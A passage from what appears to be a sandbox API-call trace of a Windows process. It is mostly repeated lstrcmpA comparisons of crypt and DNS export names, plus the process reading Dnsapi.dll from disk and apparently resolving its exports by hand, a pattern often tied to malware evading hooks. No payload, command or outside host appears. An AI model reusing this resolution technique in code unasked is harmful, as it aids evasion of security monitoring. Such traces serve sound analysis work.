lpString2="CertAddCRLLinkToStore") returned 1 [0210.712] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0210.712] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0210.712] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0210.712] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0210.712] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0210.712] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0210.712] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0210.712] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0210.712] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0210.712] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0210.712] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0210.712] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0210.712] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0210.712] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0210.712] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0210.712] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0210.712] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0210.712] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0210.712] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0210.712] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0210.713] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0210.713] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0210.713] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0210.713] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0210.713] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0210.713] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0210.713] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0210.713] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0210.713] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0210.713] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0210.713] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0210.713] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0210.713] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0210.713] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0210.713] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0210.713] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0210.713] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0210.713] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0210.713] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0210.713] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0210.713] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0210.713] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0210.713] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0210.714] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0210.714] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0210.715] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0210.715] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0210.715] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0210.715] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0210.715] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0210.715] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0210.715] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0210.715] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0210.715] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0210.715] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0210.715] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0210.715] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0210.715] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0210.715] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0210.715] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0210.715] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0210.715] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0210.715] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0210.715] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0210.715] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0210.715] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0210.715] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0210.715] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0210.715] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0211.058] GetProcessHeap () returned 0x4a0000 [0211.058] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4112040 | out: hHeap=0x4a0000) returned 1 [0211.074] GetProcessHeap () returned 0x4a0000 [0211.074] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b9100 [0211.075] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0211.472] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0211.472] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0211.472] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0211.472] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0211.473] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0211.473] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0211.473] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0211.473] GetProcessHeap () returned 0x4a0000 [0211.473] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa7b88) returned 0x3a8d010 [0211.475] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0211.475] ReadFile (in: hFile=0x17c, lpBuffer=0x3a8d010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3a8d010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0211.817] CloseHandle (hObject=0x17c) returned 1 [0211.818] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0211.818] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0211.818] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0211.818] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0211.818] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0211.818] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0211.818] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0211.818] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0211.818] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0211.818] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0211.819] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0211.819] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0211.819] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0211.819] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0211.819] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0211.819] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0211.819] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0211.819] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0211.819] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0211.819] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0211.819] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0211.819] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0211.819] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0211.819] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0211.819] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0211.819] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0211.819] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0211.819] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0211.819] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0211.819] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0211.819] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0211.819] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0211.819] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0211.820] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0211.820] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0211.820] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0211.820] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0211.820] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0211.820] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0211.820] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0211.820] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0211.820] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0211.820] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0211.820] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0211.820] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0211.820] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0211.820] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0211.820] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0211.820] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0211.820] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0211.820] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0211.820] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0211.820] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0211.820] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0211.820] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0211.820] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0211.820] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0211.821] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0211.821] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0211.821] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0211.821] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0211.821] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0211.821] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0211.821] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0211.821] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0211.821] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0211.821] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0211.821] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0211.821] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0211.821] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0211.821] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0211.821] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0211.821] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0211.821] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0211.821] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0211.821] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0211.821] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0211.821] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0211.821] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0211.821] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0211.822] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0211.822] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0211.822] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0211.822] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0211.822] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0211.822] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0211.822] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0211.822] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0211.822] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0211.822] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0211.822] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0211.822] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0211.822] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0211.822] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0211.822] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0211.822] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0211.822] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0211.822] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0211.822] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0211.822] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0211.822] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0211.822] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0211.822] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0211.823] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0211.823] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0211.823] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0211.823] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0211.823] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0211.823] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0211.823] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0211.823] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0211.823] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0211.823] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0211.823] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0211.823] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0211.823] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0211.823] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0211.823] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0211.823] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0211.823] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0211.823] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0211.823] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0211.823] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0211.823] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0211.823] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0211.823] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0211.823] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0211.825] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0211.825] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0211.825] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0211.825] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0211.825] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0211.825] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0211.825] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0211.825] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0211.825] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0211.825] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0211.825] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0211.825] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0211.826] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0211.826] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0211.826] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0211.826] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0211.826] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0211.826] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0211.826] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0211.826] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0211.826] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0211.826] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0211.826] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0211.826] lstrcmpA (lpString1="DnsApiSetDebugGlobals", 